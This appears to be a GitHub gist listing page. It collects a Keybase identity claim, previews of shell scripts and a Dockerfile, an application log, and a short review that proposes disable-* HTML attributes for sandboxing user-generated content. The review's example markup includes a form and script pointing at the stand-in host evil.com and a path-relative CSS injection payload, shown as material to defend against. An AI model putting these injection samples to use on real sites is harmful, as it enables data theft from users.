I hereby claim:
- I am thebiggerguy on github.
- I am thebiggerguy (https://keybase.io/thebiggerguy) on keybase.
- I have a public key ASD64kksLAvgGAoYuKLddJh53SdNbsdMccL2wQwx1YkMyAo
To claim this, I am signing this object:
| #!/usr/bin/env sh | |
| set -o errexit # Exit on most errors (see the manual) | |
| set -o errtrace # Make sure any error trap is inherited | |
| set -o nounset # Disallow expansion of unset variables | |
| set -o pipefail # Use last non-zero exit code in a pipeline | |
| set -o xtrace # Trace the execution of the script (debug) | |
| BUILD_DIR='' |
| #!/bin/bash | |
| set -o errexit # Exit on most errors (see the manual) | |
| set -o errtrace # Make sure any error trap is inherited | |
| set -o nounset # Disallow expansion of unset variables | |
| set -o pipefail # Use last non-zero exit code in a pipeline | |
| #set -o xtrace # Trace the execution of the script (debug) | |
| root="${PWD}" | |
| for resfile in */*.resx ; do |
| FROM multiarch/debian-debootstrap:armhf-buster-slim as base | |
| RUN apt-get update && \ | |
| DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends apt-transport-https ca-certificates dirmngr gnupg && \ | |
| apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 3FA7E0328081BFF6A14DA29AA6A19B38D3D831EF && \ | |
| echo 'deb https://download.mono-project.com/repo/debian stable-stretch main' | tee /etc/apt/sources.list.d/mono-official-stable.list && \ | |
| apt-get remove --purge --autoremove -y gnupg dirmngr && \ | |
| apt-get update && \ | |
| DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends curl ca-certificates iputils-ping \ | |
| mono-runtime \ |
I hereby claim:
To claim this, I am signing this object:
Review of postxss in repect to Strawman proposal for a "Safe Node" in the DOM. I suggest a less complicated syntax, using a/series of disable-[ELEMENT] (e.g. disable-form and/or disable-script) atrributes of current/custom elements.
<div disable-form disable-script disable-link id="user-gen-content">
<form action="http://evil.com/log.cgi">
<script src="http://evil.com/log.js"></script>
<link rel="alternate" type="application/atom+xml" href="http://example.com/phpBB3/search.php/
{}*{color:red;}//styles/prosilver/theme/feed.php" /> <!-- http://blog.portswigger.net/2015/02/prssi.html -->| {USER}, {HASH} and {DOC_X} have been replaced | |
| 12:49:26 GMT+0100 Log File: C:\Users\{USER}\AppData\Roaming\BalsamiqMockupsForDesktop.{HASH}.1\Local Store\BalsamiqMockups.log | |
| 12:49:26 GMT+0100 Balsamiq Mockups version 999.82 - 10/18/2013 09:22 | |
| 12:49:26 GMT+0100 ======= | |
| 12:49:26 GMT+0100 Operating System: Windows 7 | |
| 12:49:26 GMT+0100 Player: WIN 11,8,800,168 | |
| 12:49:26 GMT+0100 ======= | |
| 12:49:26 GMT+0100 null | |
| 12:49:28 GMT+0100 loadDataIntoMemory:file:///C:/Users/{USER}/Documents/mockups/{DOC_1}.bmml |